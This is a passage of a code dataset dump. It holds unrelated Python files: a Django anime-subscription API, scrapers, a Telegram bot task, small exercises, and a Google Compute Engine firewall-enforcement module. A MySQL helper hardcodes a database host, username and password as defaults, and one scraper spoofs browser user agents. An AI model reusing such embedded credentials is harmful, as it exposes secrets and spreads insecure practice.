IsAuthenticated,)\n\n def get_serializer_class(self):\n if self.request.method in ('PUT', 'PATCH', ):\n return SubscriptionUpdateSerializer\n elif self.request.method in ('GET', ):\n return SubscriptionSerializer\n return SubscriptionCreateSerializer\n\n def get_queryset(self):\n return Subscription.objects.filter(~Q(status=SUBSCRIPTION_FORGONE) &\n Q(user=self.request.user))\n\n def pre_save(self, obj):\n obj.user = self.request.user\n\n # override `create` 
method\n def create(self, request, *args, **kwargs):\n aid = request.DATA.get('id')\n anime = Anime.objects.filter(aid=aid)\n if not anime:\n # Get the anime data from back_end\n anime_data = get_anime_detail(aid=aid)\n if not anime_data:\n raise APIException(detail='Anime not found')\n\n # convert the timestamp to `datetime` object, then save the object\n anime_data['updated_time'] = datetime.fromtimestamp(anime_data['updated_time'])\n _anime = AnimeSerializer(data=anime_data)\n if _anime.is_valid():\n anime = _anime.save()\n else:\n return Response(data={'error': _anime._errors}, status=status.HTTP_400_BAD_REQUEST)\n\n seasons = anime_data['season'] if anime_data else anime\n # Save the `season`\n for season in seasons:\n if not Season.objects.filter(season_id=season['season_id']):\n season['anime'] = anime.id\n _season = SeasonSerializer(data=season)\n if _season.is_valid():\n _season.save()\n else:\n anime = anime[0]\n\n instance = Subscription.objects.filter(Q(user=self.request.user) & Q(anime_id=anime.id))\n\n if not instance:\n Subscription.objects.create(anime=anime, user=self.request.user)\n else:\n instance = instance.first()\n if not instance.status == SUBSCRIPTION_FORGONE:\n raise APIException(detail='You had already add the anime to your subscriptions.')\n instance.status = SUBSCRIPTION_WATCHING\n instance.currently_watched = 0\n instance.save()\n\n return Response(data={'anime': anime.id}, status=status.HTTP_201_CREATED)\n\n # override `update` method\n def update(self, request, *args, **kwargs):\n partial = kwargs.pop('partial', False)\n instance = self.get_object()\n\n if instance.status == SUBSCRIPTION_FORGONE:\n raise APIException(detail='Detail not found')\n # `SUBSCRIPTION_FORGONE` status only can be marked when\n # the `DELETE` method been used\n request_data = dict(copy.deepcopy(request.data))\n if not status in (SUBSCRIPTION_WATCHED, SUBSCRIPTION_WATCHING):\n request_data['status'] = SUBSCRIPTION_WATCHING\n\n serializer = self.get_serializer(instance, data=request_data, partial=partial)\n serializer.is_valid(raise_exception=True)\n\n # TODO: if the anime don't have any season, then?\n # check the submitted `count` is valid or not\n currently_watched = int(request.data['currently_watched'])\n if instance.season:\n if (instance.season.count < currently_watched or currently_watched < 0):\n raise APIException(detail='The episode count is not valid')\n else:\n if instance.anime.episode < currently_watched:\n raise APIException(detail='The episode count is not valid')\n\n self.perform_update(serializer)\n return Response(serializer.data)\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.status = SUBSCRIPTION_FORGONE\n instance.save()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass SearchViewSet(viewsets.ReadOnlyModelViewSet):\n serializer_class = SearchSerializer\n\n def get_queryset(self):\n keyword = self.request.GET.get('keyword', None)\n if not keyword:\n return []\n\n data = Anime.objects.filter(Q(name__contains=keyword) | Q(description__contains=keyword))\n return data if data else search(keyword)\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n permission_classes = (IsSelf,)\n queryset = User.objects.all()\n\n def get_serializer_class(self):\n if self.request.method in ('POST', ):\n return UserCreateSerializer\n elif self.request.method in ('PUT', 'PATCH'):\n return UserUpdateSerializer\n else:\n return UserProfileSerializer\n\n def retrieve(self, request, *args, **kwargs):\n instance = self.get_object()\n 
serializer_class = UserSerializer if instance == request.user \\\n else UserProfileSerializer\n serializer = serializer_class(instance)\n return Response(serializer.data)\n\n def create(self, request, *args, **kwargs):\n user = UserCreateSerializer(data=request.DATA)\n if user.is_valid():\n if User.objects.filter(email__iexact=user.data['email']):\n raise APIException(detail='The email had been used.')\n User.objects.create_user(**user.data)\n return Response(user.data, status=status.HTTP_201_CREATED)\n else:\n return Response(user.errors, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"RicterZ/AnimeReminder","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"74044534545","text":"# Given a string, find the first repeated character in it.\n# We need to find the character that occurs more than once and whose index of\n# second occurrence is smallest.\n\n#sample test case\n#Input - geeksforgeeks\n#Output - 'e'\n#Input - gekmke\n#Output - 'k' -- because index of the point where element is repeated is less\n\n#one pointer in the beginning, one at the end,but the end pointer should not move\n#if the element at the beginning is not repeating, one way is to make a hash table,\n# and check for the values\n\n\ndef find_repeating(string):\n alpha_set = set()\n for each in string:\n if each in alpha_set:\n return each\n else:\n alpha_set.add(each)\n return -1\n\nstring = 'mjabkkmj'\nprint(find_repeating(string))\n","repo_name":"Harshit-Raj-2000/Algorithms-and-Data-Structures","sub_path":"coding interview practice/strings/first repeating character.py","file_name":"first repeating character.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4576968994","text":"#!/usr/bin/env python3\n\n# Get a dictionary of the courses that meet the\n# American History and Institutions GE requirement at UCSB\n# from this page:\n# https://my.sa.ucsb.edu/catalog/Current/UndergraduateEducation/AHICourseList.aspx\n\nimport json\nimport datetime\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nimport pprint\nfrom copy import deepcopy\nfrom time import sleep\n\nahi_url=\"https://my.sa.ucsb.edu/catalog/Current/UndergraduateEducation/AHICourseList.aspx\"\n\ndef p_to_tuple(p_element):\n '''\n turn a p element into a tuple (course_num,title) for a given GE\n\n given the selenium object that represents one p element\n from the target web page, return a dictionary of the form,\n for example: {\"ANTH 131\":\"North American Indians\"}\n\n The p element has this format:\n\n

         <p>\n            ANTH 131 - <i>North American Indians</i> \n         </p>
\n '''\n\n # Course Number, e.g. ANTH 131, is the text of the p element,\n # stripped of white space\n p_text = p_element.text.strip()\n course_num = p_text.split(\"-\",1)[0].strip()\n \n # course_title, e.g. \"North American Indians\"\n # is the text of the child i element\n\n child_i_element = p_element.find_elements_by_xpath(\"i\")\n course_title = child_i_element[0].text.strip()\n\n return (course_num,course_title)\n \n\n\nif __name__==\"__main__\":\n \n # Bring up the firefox driver (this line would be different for Chrome)\n # See README.md of this repo for instructions on downloading that\n \n # driver = webdriver.Firefox()\n driver = webdriver.Chrome()\n\n driver.get(ahi_url)\n expected_title = \"UC Santa Barbara General Catalog - American History and Institutions Course List\"\n stripped_title=driver.title.strip()\n if expected_title == stripped_title:\n print(\"found \",expected_title)\n else:\n print(\"I was expecting title:\",expected_title)\n print(\"But what I got instead was: \",stripped_title)\n\n # Look for div with id=content\n # Under that we want div with class contentpadding\n # Under that we want ALL of the p elements\n\n list_of_p_elements = driver.find_elements_by_xpath(\"//div[@id='content']/div[@class='contentpadding']/p\")\n\n # dictionary <- list of tuples <- map <- (list of elem mapped to tuples)\n \n AHI_dict = dict(list(map(p_to_tuple,list_of_p_elements)))\n\n pprint.pprint(AHI_dict)\n driver.close()\n","repo_name":"ucsb-cs8/selenium-scrape-ucsb-courses","sub_path":"AHI/getAHI.py","file_name":"getAHI.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4896368830","text":"import asyncio\n\nfrom Music.MusicUtilities.database.queue import is_active_chat\nfrom Music.MusicUtilities.tgcallsrun.music import smexy\nfrom Music.config import AUTO_LEAVE, LOG_GROUP_ID\n\n\nasync def auto_leave():\n if AUTO_LEAVE == str(True):\n while not await asyncio.sleep(AUTO_LEAVE):\n async for i in smexy.iter_dialogs():\n chat_type = i.chat.type\n if chat_type in [\n \"supergroup\",\n \"group\",\n ]:\n chat_id = i.chat.id\n if (\n chat_id != LOG_GROUP_ID\n and chat_id != -1001627221128\n and chat_id != -1001665437027\n and chat_id != -1001202786293\n ):\n if not await is_active_chat(chat_id):\n try:\n await smexy.leave_chat(\n chat_id\n )\n except:\n continue\n\n\nasyncio.create_task(auto_leave())\n","repo_name":"Halawa-Ex/ex-music","sub_path":"Music/helpers/userbotleave.py","file_name":"userbotleave.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10715955101","text":"\r\nmarks=[] #creating list marks\r\nm=\"start\"\r\ni=0\r\nwhile m!=\"s\":\r\n i+=1\r\n print(\"enter marks of student\",i)\r\n a=int(input())\r\n marks.append(a)\r\n m=input(\"press any other key to continue entering marks of students or 's' to stop: \") #inputing marks of students into marks until m=”s”\r\nprint(marks) #print marks\r\na=max(marks) # calculating maximum marks\r\nprint(\"highest marks scored\", a) #displaying maximum marks\r\ne=marks.count(a) #calculating number of students with maximum marks\r\nprint(\"number of students scoring highest marks\",e) #displaying number of students with maximum marks\r\nmarks1=[] #creating a list marks1\r\nmarks1=marks1+marks \r\nfor i in marks1:\r\n if i==a:\r\n marks1.remove(i) #removing maximum marks in marks1\r\nprint(\"second highest marks scored:\", 
max(marks1)) #finding 2nd highest marks scored in marks\r\nprint(marks)\r\nc=int(input(\"enter fail marks:\")) #receiving fail marks\r\ni=0\r\nn=len(marks)#finding length of marks\r\nwhile i int:\n jthSmallest = len(nums) - k\n\n return self.quickSelect(nums, 0, len(nums) - 1, jthSmallest)\n\n def quickSelect(self, nums: List[int], start: int, end: int, jthSmallest: int) -> int:\n\n pivot = self.partition(nums, start, end)\n\n if (pivot == jthSmallest):\n return nums[pivot]\n elif (jthSmallest < pivot):\n return self.quickSelect(nums, start, pivot - 1, jthSmallest)\n else:\n return self.quickSelect(nums, pivot + 1, end, jthSmallest)\n\n def partition(self, nums: List[int], start: int, end: int) -> int:\n randomIndex = randint(start, end)\n\n self.swap(nums, randomIndex, start)\n\n pivot = nums[start]\n\n smaller = start\n\n for bigger in range(start + 1, end + 1):\n if nums[bigger] < pivot:\n smaller += 1\n self.swap(nums, smaller, bigger)\n\n self.swap(nums, start, smaller)\n\n return smaller\n\n def swap(self, nums: List[int], i: int, j: int) -> None:\n temp = nums[i]\n nums[i] = nums[j]\n nums[j] = temp\n\n\nprint(Solution().findKthLargest([4, 1, 2, 11], 2))\n","repo_name":"sammndhr/algorithms","sub_path":"interview_kickstart/01_sorting_algorithms/class_discussed_problems/python/0215_kth_largest_element_in_an_array.py","file_name":"0215_kth_largest_element_in_an_array.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"15636591876","text":"#!usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport pymysql\n\nclass use_mysql():\n\n def __init__(self,hostname=\"183.131.6.183\",portno=4987,username=\"test_ggcj\",\n pwd=\"test_ggcj_2013\",db=\"ggcj_gift_statistics\"):\n\n self.conn = pymysql.connect(host=hostname,port=portno,user=username,passwd=pwd)\n self.cur = self.conn.cursor()\n self.cur.execute(\"USE \"+db)\n\n # print (\"数据库连接异常,请检查\")\n\n # print (cur.fetchone()[0])\n\n\n def select_sql(self,sql=\"SELECT amount FROM t_all_new_statistics order by amount DESC \"):\n\n allrang_list = []\n\n count = self.cur.execute(sql)\n for line in self.cur.fetchall():\n allrang_list.append(line[0])\n\n # print (\"数据库查询失败\")\n # print (count)\\\n allrang_list = self.cur.fetchall()\n for each in allrang_list:\n print (each)\n # return allrang_list\n\n def close_sql(self):\n self.conn.close()\n\n\nif __name__ == \"__main__\":\n test_mysql = use_mysql()\n test_mysql.select_sql()\n","repo_name":"songjianmin/ggcj","sub_path":"huodong/huodong_mysql.py","file_name":"huodong_mysql.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12226166835","text":"import aiohttp\nimport asyncio\nfrom bs4 import BeautifulSoup\nfrom postgresql import Database\nimport time\nimport json\nfrom urllib.parse import urlparse\nfrom fake_useragent import UserAgent\n\n\n\ndb = Database()\nasync def main():\n start_time = time.time()\n with open('../urls.txt', 'r') as urls:\n tasks = []\n for url in urls:\n tasks.append(asyncio.create_task(get_website_code(url.strip())))\n\n pages = await asyncio.gather(*tasks)\n start_time_2 = time.time()\n time_for_db = 0\n for page in pages:\n if page[0]:\n data = get_data(page[0], page[1])\n start_time_3 = time.time()\n db.add_data(data, page[1])\n time_for_db += time.time()-start_time_3\n\n print(f\"Время затраченное на запросы к дб: {time_for_db}\")\n print(f\"Время затраченное на синхронную 
часть: {time.time() - start_time_2}\")\n\n\n finish_time = time.time() - start_time\n print(f'time for script ---- {finish_time}s')\n\n\nlist_urls = []\nasync def get_website_code(url):\n domain = '.'.join(urlparse(url.strip()).netloc.split('.')[:-1])\n while list_urls.count(domain) > 5:\n await asyncio.sleep(1)\n\n list_urls.append(domain)\n page = None\n try:\n async with aiohttp.ClientSession() as session:\n headers = {\n 'User-Agent': UserAgent().chrome\n }\n response = await session.post(url, headers=headers)\n\n list_urls.remove(domain)\n if response.status in [301, 302, 403, 404, 500, 504]:\n print(f'-----------------------{response.status}----------------------- {url}')\n else:\n page = await response.text()\n except UnicodeDecodeError:\n print(f\"------ {url} -------- Can't decode page\")\n except Exception as ex:\n print(f'------ {url} --------\\n{ex}')\n finally:\n return [page, url]\n\ndef get_data(page, url):\n soup = BeautifulSoup(page, 'html.parser')\n print(page)\n\n title = soup.find('title')\n if title:\n title = title.text.strip()\n\n meta_discription = soup.find('meta', {'name': 'description'})\n if meta_discription:\n meta_discription = meta_discription.get('content')\n\n headers = {}\n for index, header in enumerate(['h1', 'h2', 'h3', 'h4', 'h5', 'h6']):\n headers[header] = [h1.text.strip() for h1 in soup.find_all(header)]\n\n schema_markup = [i.text.strip('\\n') for i in soup.find_all('script', {'type': 'application/ld+json'})]\n\n with open('../selectors.json', 'r') as file:\n selectors = json.load(file)\n elements = {}\n type_key = 'for_all'\n if url in selectors:\n type_key = url\n\n try:\n for key, value in selectors[type_key].items():\n if isinstance(value, list):\n elements[key] = soup.select(f'{value[0]}')[0].get(f'{value[1]}')\n else:\n elements[key] = soup.select(f'{value}')[0].text.strip()\n except IndexError:\n elements[key] = None\n\n\n data = {\n 'title': title,\n 'meta_description': meta_discription,\n 'headers': json.dumps(headers),\n 'schema_markup': json.dumps(schema_markup),\n 'text': soup.text.replace('\\n', ''),\n 'selectors': json.dumps(elements)\n }\n return data\n\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"Freelance111/parser","sub_path":"for_the_same_domains/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16717692111","text":"import hashlib\nimport httplib\nimport json\nimport operator\nimport socket\nimport ssl\nimport time\n\nfrom googleapiclient import errors\nimport httplib2\nfrom retrying import retry\nfrom google.apputils import datelib\nfrom google.cloud.security.common.util import log_util\n\n# TODO: The next editor must remove this disable and correct issues.\n# pylint: disable=missing-type-doc,missing-return-type-doc,missing-return-doc\n# pylint: disable=missing-param-doc,missing-raises-doc\n\n# The name of the GCE API.\nAPI_NAME = 'compute'\n\n# The root of the GCE API.\nAPI_ROOT = 'https://www.googleapis.com/'\n\n# The version of the GCE API to use.\nAPI_VERSION = 'v1'\n\n# The compute engine scope.\nSCOPE = 'https://www.googleapis.com/auth/compute'\n\nLOGGER = log_util.get_logger(__name__)\n\n# What transient exceptions should be retried.\nRETRY_EXCEPTIONS = (httplib.ResponseNotReady, httplib.IncompleteRead,\n httplib2.ServerNotFoundError, socket.error, ssl.SSLError,)\n\n# Allowed items in a firewall rule.\nALLOWED_RULE_ITEMS = set(('allowed', 'description', 'name', 
'network',\n 'sourceRanges', 'sourceTags', 'targetTags'))\n\n# Maximum time to allow an active API operation to wait for status=Done\nOPERATION_TIMEOUT = 300.0\n\n\nclass Error(Exception):\n \"\"\"Base error class for the module.\"\"\"\n\n\nclass FirewallEnforcementFailedError(Error):\n \"\"\"Updating firewall for project failed.\"\"\"\n\n\nclass InvalidFirewallRuleError(Error):\n \"\"\"Raised if a firewall rule doesn't look like a firewall rule should.\"\"\"\n\n\nclass DuplicateFirewallRuleNameError(Error):\n \"\"\"Raised if a rule name is reused in a policy, names must be unique.\"\"\"\n\n\ndef http_retry(e):\n \"\"\"retry_on_exception for retry. Returns True for exceptions to retry.\"\"\"\n if isinstance(e, errors.HttpError):\n return e.resp.status in (429, 500, 502, 503)\n if isinstance(e, RETRY_EXCEPTIONS):\n return True\n return False\n\n\ndef get_network_name_from_url(network_url):\n \"\"\"Given a network URL, return the name of the network.\n\n Args:\n network_url: str - the fully qualified network url, such as\n (https://www.googleapis.com/compute/v1/projects/'\n 'my-proj/global/networks/my-network')\n\n Returns:\n str - the network name, my-network in the previous example\n \"\"\"\n return network_url.split('/')[-1]\n\n\ndef build_network_url(project, network):\n \"\"\"Render the network url from project and network names.\n\n Args:\n project: A str- The name of the GCE project to operate upon.\n network: A str- The name of the network to operate upon.\n\n Returns:\n The fully qualified network url for the given project/network.\n \"\"\"\n return (u'%(root)s%(api_name)s/%(version)s/projects/%(project)s/global/'\n 'networks/%(network)s') % {\n 'api_name': API_NAME,\n 'network': network,\n 'project': project,\n 'root': API_ROOT,\n 'version': API_VERSION\n }\n\n\nclass ComputeFirewallAPI(object):\n \"\"\"Wrap calls to the Google Compute Engine API.\n\n API calls are decorated with retry to ensure temporary network errors do not\n cause failures.\n\n If initialized in dry run mode, calls which could modify the compute project\n are no-ops and always return a successful result.\n \"\"\"\n\n def __init__(self, gce_service, dry_run=False):\n \"\"\"Constructor.\n\n Args:\n gce_service: A GCE service object built using the discovery API.\n dry_run: Bool - True to perform a dry run for reporting firewall\n changes.\n \"\"\"\n self.gce_service = gce_service\n self._dry_run = dry_run\n\n @retry(\n retry_on_exception=http_retry,\n wait_exponential_multiplier=1000,\n stop_max_attempt_number=4)\n def list_networks(self, project, fields=None):\n \"\"\"List the networks associated with a GCE project.\n\n Args:\n project: The id of the project to query.\n fields: If defined, limits the response to a subset of all fields.\n\n Returns:\n The GCE response.\n \"\"\"\n LOGGER.debug('Listing networks...')\n return self.gce_service.networks().list(\n project=project, fields=fields).execute()\n\n @retry(\n retry_on_exception=http_retry,\n wait_exponential_multiplier=1000,\n stop_max_attempt_number=4)\n def list_firewalls(self, project, page_token=None):\n \"\"\"List the firewalls of a given project.\n\n Args:\n project: The id of the project to query.\n page_token: A str or None- if set, then a pageToken\n to pass to the GCE api call.\n\n Returns:\n The GCE response.\n \"\"\"\n LOGGER.debug('Listing firewalls...')\n return self.gce_service.firewalls().list(\n project=project, pageToken=page_token).execute()\n\n @retry(\n retry_on_exception=http_retry,\n wait_exponential_multiplier=1000,\n 
stop_max_attempt_number=4)\n def delete_firewall_rule(self, project, rule):\n \"\"\"Delete firewall rules.\n\n Args:\n project: The id of the project to modify.\n rule: The firewall rule dict to delete.\n\n Returns:\n The GCE response.\n \"\"\"\n LOGGER.info('Deleting firewall rule %s on project %s. Deleted rule: %s',\n rule['name'], project, json.dumps(rule))\n if self._dry_run:\n return self._create_dry_run_response(rule['name'])\n return self.gce_service.firewalls().delete(\n firewall=rule['name'], project=project).execute()\n\n @retry(\n retry_on_exception=http_retry,\n wait_exponential_multiplier=1000,\n stop_max_attempt_number=4)\n def insert_firewall_rule(self, project, rule):\n \"\"\"Insert a firewall rule.\n\n Args:\n project: The id of the project to modify.\n rule: The firewall rule dict to add.\n\n Returns:\n The GCE response.\n \"\"\"\n LOGGER.info(\n 'Inserting firewall rule %s on project %s. Inserted rule: %s',\n rule['name'], project, json.dumps(rule))\n if self._dry_run:\n return self._create_dry_run_response(rule['name'])\n return self.gce_service.firewalls().insert(\n body=rule, project=project).execute()\n\n @retry(\n retry_on_exception=http_retry,\n wait_exponential_multiplier=1000,\n stop_max_attempt_number=4)\n def update_firewall_rule(self, project, rule):\n \"\"\"Update a firewall rule.\n\n Args:\n project: The id of the project to modify.\n rule: The firewall rule dict to update.\n\n Returns:\n The GCE response.\n \"\"\"\n LOGGER.info('Updating firewall rule %s on project %s. Updated rule: %s',\n rule['name'], project, json.dumps(rule))\n if self._dry_run:\n return self._create_dry_run_response(rule['name'])\n return self.gce_service.firewalls().update(\n body=rule, firewall=rule['name'], project=project).execute()\n\n @retry(\n retry_on_exception=http_retry,\n wait_exponential_multiplier=1000,\n stop_max_attempt_number=4)\n # TODO: Investigate improving so we can avoid the pylint disable.\n # pylint: disable=too-many-locals\n def wait_for_any_to_complete(self, project, responses, timeout=0):\n \"\"\"Wait for one or more requests to complete.\n\n Args:\n project: The id of the project to query.\n responses: A list of Response objects from GCE for the operation.\n timeout: An optional maximum time in seconds to wait for an operation\n to complete. 
Operations that exceed the timeout are marked as\n Failed.\n\n Returns:\n A tuple of (completed, still_running) requests.\n \"\"\"\n started_timestamp = time.time()\n\n while True:\n completed_operations = []\n running_operations = []\n for response in responses:\n status = response['status']\n if status == 'DONE':\n completed_operations.append(response)\n continue\n\n operation_name = response['name']\n LOGGER.debug('Checking on operation %s', operation_name)\n request = self.gce_service.globalOperations().get(\n project=project, operation=operation_name)\n response = request.execute()\n status = response['status']\n LOGGER.info('status of %s is %s', operation_name, status)\n if response['status'] == 'DONE':\n completed_operations.append(response)\n continue\n\n if timeout and time.time() - started_timestamp > timeout:\n # Add a timeout error to the response\n LOGGER.error(\n 'Operation %s did not complete before timeout of %f, '\n 'marking operation as failed.', operation_name, timeout)\n response.setdefault('error', {}).setdefault(\n 'errors', []).append({\n 'code':\n 'OPERATION_TIMEOUT',\n 'message': (\n 'Operation exceeded timeout for completion '\n 'of %0.2f seconds' % timeout)\n })\n completed_operations.append(response)\n else:\n # Operation still running\n running_operations.append(response)\n\n if completed_operations or not responses:\n break\n else:\n time.sleep(2)\n\n for response in completed_operations:\n try:\n op_insert_timestamp = datelib.Timestamp.FromString(\n response.get('insertTime', '')).AsSecondsSinceEpoch()\n op_start_timestamp = datelib.Timestamp.FromString(\n response.get('startTime', '')).AsSecondsSinceEpoch()\n op_end_timestamp = datelib.Timestamp.FromString(\n response.get('endTime', '')).AsSecondsSinceEpoch()\n except ValueError:\n op_insert_timestamp = op_start_timestamp = op_end_timestamp = 0\n\n op_wait_time = op_end_timestamp - op_insert_timestamp\n op_exec_time = op_end_timestamp - op_start_timestamp\n LOGGER.info('Operation %s completed. Operation type: %s, '\n 'request time: %s, start time: %s, finished time: %s, '\n 'req->end seconds: %i, start->end seconds: %i.',\n response.get('name', ''),\n response.get('operationType', ''),\n response.get('insertTime', ''),\n response.get('startTime', ''),\n response.get('endTime', ''), op_wait_time, op_exec_time)\n LOGGER.debug('Operation response object: %r', response)\n\n return (completed_operations, running_operations)\n\n def wait_for_all_to_complete(self, project, responses, timeout=0):\n \"\"\"Wait for all requests to complete.\n\n Args:\n project: The id of the project to query.\n responses: A list of Response objects from GCE for the operation.\n timeout: An optional maximum time in seconds to wait for an operation\n to complete. Operations that exceed the timeout are marked as\n Failed.\n\n Returns:\n A list of completed requests.\n \"\"\"\n completed_operations = []\n running_operations = responses\n\n while running_operations:\n (completed, running_operations) = (self.wait_for_any_to_complete(\n project, running_operations, timeout))\n completed_operations.extend(completed)\n\n return completed_operations\n\n # pylint: disable=no-self-use\n # TODO: Investigate fixing the pylint issue.\n def is_successful(self, response):\n \"\"\"Checks if the operation finished with no errors.\n\n If the operation response contains an 'error' key, then the error code\n is checked. 
Any error code that is not ignored causes this to return\n False.\n\n Args:\n response: A GlobalOperations response object from an API call.\n\n Returns:\n True if there were no errors, or all errors are ignored, otherwise\n False.\n \"\"\"\n success = True\n if 'error' in response:\n # 'error' should always contains an 'errors' list:\n if 'errors' in response['error']:\n for error in response['error']['errors']:\n # TODO: Verify current codes.\n # We ignore the following errors:\n # RESOURCE_ALREADY_EXISTS: Because another program somewhere\n # else could have already added the rule.\n # INVALID_FIELD_VALUE: Because the network probably\n # disappeared out from under us.\n if error.get('code') in [\n 'RESOURCE_ALREADY_EXISTS', 'INVALID_FIELD_VALUE'\n ]:\n LOGGER.warn('Ignoring error: %s', error)\n else:\n LOGGER.error('Response has error: %s', error)\n success = False\n else:\n LOGGER.error('Unknown error response: %s', response['error'])\n success = False\n return success\n\n # pylint: disable=no-self-use\n # TODO: Investigate fixing the pylint issue.\n def _create_dry_run_response(self, rule_name):\n \"\"\"A fake successful completed response.\n\n This is used for dry run execution to prevent any changes to the\n existing firewall rules on a project.\n\n Args:\n rule_name: The name of the firewall rule this response is for.\n\n Returns:\n A fake successful completed response.\n \"\"\"\n return {'status': 'DONE', 'name': rule_name}\n\n\nclass FirewallRules(object):\n \"\"\"A collection of validated firewall rules.\"\"\"\n\n def __init__(self, project, rules=None):\n \"\"\"Constructor.\n\n Args:\n project: The GCE project id the rules apply to.\n rules: A list of rule dicts to add to the object.\n\n Raises:\n DuplicateFirewallRuleNameError: Two or more rules have the same name.\n InvalidFirewallRuleError: One or more rules failed validation.\n \"\"\"\n self._project = project\n self.rules = {}\n if rules:\n self.add_rules(rules)\n\n def __eq__(self, other):\n \"\"\"Equality.\"\"\"\n return self.rules == other.rules\n\n def __ne__(self, other):\n \"\"\"Not Equal.\"\"\"\n return self.rules != other.rules\n\n def add_rules_from_api(self, firewall_api):\n \"\"\"Loads rules from compute.firewalls().list().\n\n Args:\n firewall_api: A ComputeFirewallAPI instance for interfacing with GCE\n API.\n\n Raises:\n DuplicateFirewallRuleNameError: Two rules have the same name.\n InvalidFirewallRuleError: A rule failed validation.\n \"\"\"\n if self.rules:\n LOGGER.warn(\n 'Can not import rules from the API into a FirewallRules '\n 'object with rules already added')\n return\n\n page_token = ''\n while True:\n if page_token:\n response = firewall_api.list_firewalls(\n self._project, page_token=page_token)\n else:\n response = firewall_api.list_firewalls(self._project)\n\n for item in response.get('items', []):\n rule = dict([(key, item[key]) for key in ALLOWED_RULE_ITEMS\n if key in item])\n self.add_rule(rule)\n\n # Are there additional pages of data?\n if 'nextPageToken' in response:\n page_token = response['nextPageToken']\n else:\n break\n\n def add_rules(self, rules, network_name=None):\n \"\"\"Adds rules from a list of rule dicts.\n\n Args:\n rules: A list of rule dicts to add to the object\n network_name: If set, rules which have no network currently defined\n will have their network set to network_name, and network_name will\n be prepended to the rule name.\n\n Rules that do have a network defined have their network matched\n against network_name, and if they differ the rule is not added.\n\n 
Raises:\n DuplicateFirewallRuleNameError: Two or more rules have the same name.\n InvalidFirewallRuleError: One or more rules failed validation.\n \"\"\"\n for rule in rules:\n self.add_rule(rule, network_name=network_name)\n\n def add_rule(self, rule, network_name=None):\n \"\"\"Adds rule to the self.rules dictionary.\n\n Args:\n rule: A valid dict representing a GCE firewall rule\n network_name: If set, rules which have no network currently defined\n will have their network set to network_name, and network_name will\n be prepended to the rule name.\n\n Rules that do have a network defined have their network matched\n against network_name, and if they differ the rule is not added.\n\n Raises:\n DuplicateFirewallRuleNameError: Two or more rules have the same name.\n InvalidFirewallRuleError: One or more rules failed validation.\n \"\"\"\n if not isinstance(rule, dict):\n raise InvalidFirewallRuleError(\n 'Invalid rule type. Found %s expected %s', type(rule), dict)\n\n new_rule = self._order_lists_in_rule(rule)\n\n if network_name:\n if 'network' in new_rule:\n rule_network = get_network_name_from_url(new_rule['network'])\n if rule_network != network_name:\n # Don't add the rule if it's network does not match\n # network_name\n LOGGER.info('Firewall rule does not apply to network %s, '\n 'skipping: %s', rule_network,\n json.dumps(new_rule))\n return\n else:\n new_rule['network'] = build_network_url(self._project,\n network_name)\n\n # Update the rule name by prepending the network, so it is\n # unique. If the new rule does not have a name defined it will\n # fail the _check_rule_before_adding validation and an\n # InvalidFirewallRuleError exception will be raised.\n if 'name' in new_rule:\n # Truncate network name if too long. This may result in\n # duplicate rule names, which will cause the network name\n # to be changed to a md5 hash representation.\n new_name = '%s-%s' % (\n network_name[:(62 - len(new_rule['name']))],\n new_rule['name'])\n\n while new_name in self.rules:\n # Firewall rule names must start with [a-z], hashes\n # could start with a number, so we prepend hn-\n # (hashed network) to the name.\n network_name = 'hn-' + hashlib.md5(\n network_name).hexdigest()\n new_name = '%s-%s' % (\n network_name[:(62 - len(new_rule['name']))],\n new_rule['name'])\n\n new_rule['name'] = new_name\n\n if self._check_rule_before_adding(new_rule):\n self.rules[new_rule['name']] = new_rule\n\n def filtered_by_networks(self, networks):\n \"\"\"Returns the subset of rules that apply to the specified network(s).\n\n Args:\n networks: A list of one or more network names to fetch rules for.\n\n Returns:\n A dictionary of rules that apply to the filtered networks.\n \"\"\"\n filtered_rules = {}\n for rule_name, rule in self.rules.items():\n if get_network_name_from_url(rule['network']) in networks:\n filtered_rules[rule_name] = rule\n\n return filtered_rules\n\n def as_json(self):\n \"\"\"Export rules to a json string.\n\n The JSON string should be an array of Firewall resource objects, see\n https://cloud.google.com/compute/docs/reference/latest/firewalls\n for details. 
Only the fields in ALLOWED_RULE_ITEMS are permitted.\n\n Returns:\n A JSON string with an array of rules sorted by network and name.\n \"\"\"\n rules = sorted(\n self.rules.values(), key=operator.itemgetter('network', 'name'))\n return json.dumps(rules, sort_keys=True)\n\n def add_rules_from_json(self, json_rules):\n \"\"\"Import rules from a json string as exported by as_json.\n\n The JSON string should be an array of Firewall resource objects, see\n https://cloud.google.com/compute/docs/reference/latest/firewalls\n for details. Only the fields in ALLOWED_RULE_ITEMS are permitted.\n\n The legacy format from older versions of GCE Enforcer is also supported.\n This format wraps the array of Firewall resources in a dictionary under\n the key 'items'.\n\n Args:\n json_rules: The JSON formatted string containing the rules to import.\n\n Raises:\n DuplicateFirewallRuleNameError: Two or more rules have the same name.\n InvalidFirewallRuleError: One or more rules failed validation.\n \"\"\"\n if self.rules:\n LOGGER.warn('Can not import from JSON into a FirewallRules object '\n 'with rules already added')\n return\n\n 